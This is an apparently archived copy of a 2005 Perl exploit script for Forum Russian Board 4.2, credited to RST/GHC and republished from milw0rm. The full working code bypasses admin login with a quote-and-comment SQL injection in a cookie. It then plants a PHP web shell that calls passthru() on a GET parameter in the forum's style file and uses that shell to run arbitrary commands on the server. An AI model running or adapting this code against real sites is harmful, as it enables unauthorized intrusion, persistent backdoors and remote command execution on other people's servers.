Docstoc

Forum Russian Board 4.2 Full Command Execution Exploit

Document Sample
Forum Russian Board 4.2 Full Command Execution Exploit Powered By Docstoc
					                           Forum Russian Board 4.2 Full Command Execution Exploit                                      Page 1/3
  1    #!/usr/bin/perl
  2
  3    #   Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
  4    #   command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
  5    #   bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
  6    #   RST/GHC − http://rst.void.ru , http://ghc.ru
  7
  8    use IO::Socket;
  9    use Getopt::Std;
  10
  11   getopts("h:p:u:i:c:");
  12
  13   $host   =   $opt_h;
  14   $path   =   $opt_p;
  15   $user   =   $opt_u;
  16   $id     =   $opt_i;
  17   $cmd    =   $opt_c || ’create’;
  18
  19   $cmdspl = "%26%26"; # ;      − for unix
  20                       # %26%26 − for windows
  21
  22   if(!$host || !$path) { usage(); }
  23   if(($cmd eq ’create’ || $cmd eq ’delete’) && (!$user || !$id)) { usage(); }
  24
  25   $host =~ s/(http:\/\/)//g;
  26   $cook = $user."’ /*";
  27
  28   if($cmd eq ’create’ || $cmd eq ’delete’){
  29   head();
  30   print ">>> CREATE SHELL\n" if ($cmd eq ’create’);
  31   print ">>> DELETE SHELL\n" if ($cmd eq ’delete’);
  32   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  33   print $sock "GET ${path}admin/style_edit.php HTTP/1.1\n";
  34   print $sock "Host: $host\n";
  35   print $sock "Accept: */*\n";
  36   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  37   print $sock "Connection: close\n\n";
  38   print "GETTING CURRENT STYLE ... [";
  39   while ($res = <$sock>)
  40   {
  41     if($res =~ /(.*)<\/textarea>/) { $data .= $1; $p = 0; }
  42     $data .= $res if $p;
  43     if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
  44   }
  45
  46   if(length($data)>0) { print " DONE ]\n"; }
  47   else { print " FAILED ]\n"; exit(); }
  48
  49   if($data =~ /rst_ghc/)
  50    {
  51    if($cmd eq ’create’) { print "SHELL ALREADY EXIST!"; exit(); }
  52    if($cmd eq ’delete’)
RusH                                                                                                                   06/21/2005
                         Forum Russian Board 4.2 Full Command Execution Exploit                                         Page 2/3
  53      {
  54      print "SHELL EXIST.\nDELETING SHELL.\n";
  55      $data =~ s/\s*<\? if\(\$_GET\[rst_ghc\]\)\{ passthru\(\$_GET\[rst_ghc\]\); \} \?>//g;
  56      }
  57    }
  58   else
  59    {
  60    if($cmd eq ’create’)
  61      {
  62      $data .= "\n";
  63      $data .= ’<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>’;
  64     }
  65    if($cmd eq ’delete’) { print "SHELL NOT EXIST. CAN’T DELETE."; exit(); }
  66    }
  67
  68   $data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  69   $post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
  70   print "CREATE NEW STYLE ...[";
  71   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\r\n";
  72   print $sock "POST ${path}admin/style_edit.php HTTP/1.1\n";
  73   print $sock "Host: $host\n";
  74   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  75   print $sock "Content−Type: application/x−www−form−urlencoded\n";
  76   print $sock "Content−length: ".length($post)."\n\n";
  77   print $sock "$post";
  78   print $sock "\n\n";
  79   print " DONE ]\n";
  80   if($cmd eq ’create’) { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
  81   if($cmd eq ’delete’) { print "SHELL DELETED!"; }
  82   }
  83   else
  84   {
  85   head();
  86   print ">>> COMMAND EXECUTE\n";
  87   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  88   print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1\n";
  89   print $sock "Host: $host\n";
  90   print $sock "Accept: */*\n";
  91   print $sock "Connection: close\n\n";
  92
  93   while ($res = <$sock>)
  94   {
  95     if($res =~ /^_END_/) { $p = 0; }
  96     $data .= $res if $p;
  97     if($res =~ /^_START_/) { $p = 1; }
  98   }
  99   if(length($data)>0) {
 100                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 101                          print $data;
 102                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 103                          exit(0);
 104                        }
RusH                                                                                                                    06/21/2005
                            Forum Russian Board 4.2 Full Command Execution Exploit      Page 3/3
 105   else { print "[−] FAILED\nMaybe you forget create shell first?\n"; exit(0); }
 106
 107   }
 108
 109   sub usage()
 110   {
 111     head();
 112     print " USAGE : r57frb.pl [options]\n\n";
 113     print " Options: \n";
 114     print "      −h − host e.g. ’127.0.0.1’ , ’www.frb.ru’\n";
 115     print "      −p − path to forum e.g. ’/frb/’ , ’/forum/’\n";
 116     print "      −u − admin username e.g. ’admin’\n";
 117     print "      −i − admin id e.g. ’1’\n";
 118     print "      −c [create|delete|cmd]\n";
 119     print "         create − for create shell\n";
 120     print "         delete − for delete shell\n";
 121     print "         cmd − any command for execute\n";
 122     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 123   exit(0);
 124   }
 125
 126   sub head()
 127   {
 128     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 129     print "Forum Russian Board 4.0 Full command execution exploit by RST/GHC\n";
 130     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 131   }
 132
 133   # milw0rm.com [2005−06−21]




RusH                                                                                    06/21/2005